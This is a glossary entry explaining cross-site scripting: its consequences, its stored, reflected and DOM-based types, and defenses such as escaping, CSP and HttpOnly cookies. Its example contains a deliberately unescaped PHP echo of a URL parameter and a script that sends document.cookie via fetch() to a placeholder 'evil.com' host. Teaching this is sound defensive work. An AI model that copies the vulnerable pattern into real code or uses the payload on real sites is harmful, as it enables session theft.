XSS

XSS (Cross-Site Scripting) is a security vulnerability where attackers inject malicious code into web pages that is then executed in the victim’s browser. Typical consequences include session hijacking, phishing, and data theft—preventable with proper escaping and security measures.

Cross-Site Scripting (XSS) is a common security vulnerability in web applications where attackers inject malicious code—usually JavaScript—into web pages viewed by other users. The injected code then runs in the victim’s browser and can steal sensitive data, manipulate user actions, or load additional malware.

XSS is particularly dangerous because attacks often happen silently: users typically don’t notice when scripts are running in the background, reading their data or hijacking their sessions.

This vulnerability has consistently appeared in the OWASP Top 10 list of the most critical web security risks.

Typical Consequences of an XSS Attack

  • Session hijacking – Stealing session cookies to impersonate a user.
  • Credential theft – Capturing login data via manipulated forms.
  • Defacement – Altering website content to display false or malicious messages.
  • Phishing attacks – Injecting fake forms to trick users into submitting sensitive information.
  • Malware distribution – Embedding malicious code that forces downloads in the victim’s browser.
  • Keylogging – Recording user keystrokes directly in the browser.

Types of XSS

  • Stored XSS (persistent)
    Malicious code is permanently stored in the application (e.g., in a database, forum post, or comment). Every user who views the page is exposed to the attack.

  • Reflected XSS (non-persistent)
    The malicious script is injected via manipulated links or form submissions and immediately reflected in the response. Commonly used in phishing attacks.

  • DOM-based XSS
    The attack manipulates the Document Object Model (DOM) in the browser using insecure JavaScript functions (e.g., innerHTML). The server is often not involved.

Example of XSS

A website outputs user input directly without sanitization:

<p>Hello, <?php echo $_GET["name"]; ?></p>

An attacker sends the link:

https://example.com/?name=<script>alert('XSS')</script>

The browser executes the JavaScript. Instead of just a popup, the attacker could steal cookies:

<script>
  fetch("https://evil.com/steal?cookie=" + document.cookie);
</script>

Protection Against XSS

  • Input validation
    – Check whether inputs match the expected format (e.g., only letters/numbers in form fields).

  • Output filtering (Escaping)
    – Properly escape special characters like <, >, ", ', or & in HTML, JavaScript, and URLs.

  • Content Security Policy (CSP)
    – Define rules for which scripts are allowed to run (e.g., only from the same domain).

  • Use framework security
    – Modern frameworks (Laravel, Symfony, Django, React, Angular) include built-in mechanisms such as automatic escaping.

  • Avoid unsafe functions
    – Do not use eval(), innerHTML, or unsafe string concatenations in client-side code.

  • HTTP-Only Cookies
    – Mark session cookies as HttpOnly so they cannot be read by JavaScript.

Best Practices

  • Never insert user input directly into HTML.
  • Use prepared statements for database queries.
  • Enable template security features in frameworks.
  • Perform regular security tests and penetration tests.
  • Use tools like OWASP ZAP or Burp Suite to detect XSS vulnerabilities.

Conclusion

XSS is one of the oldest and most dangerous vulnerabilities on the web. It can have severe consequences for users and businesses, but can be effectively prevented through proper validation, escaping, and modern security mechanisms.

Back to Glossary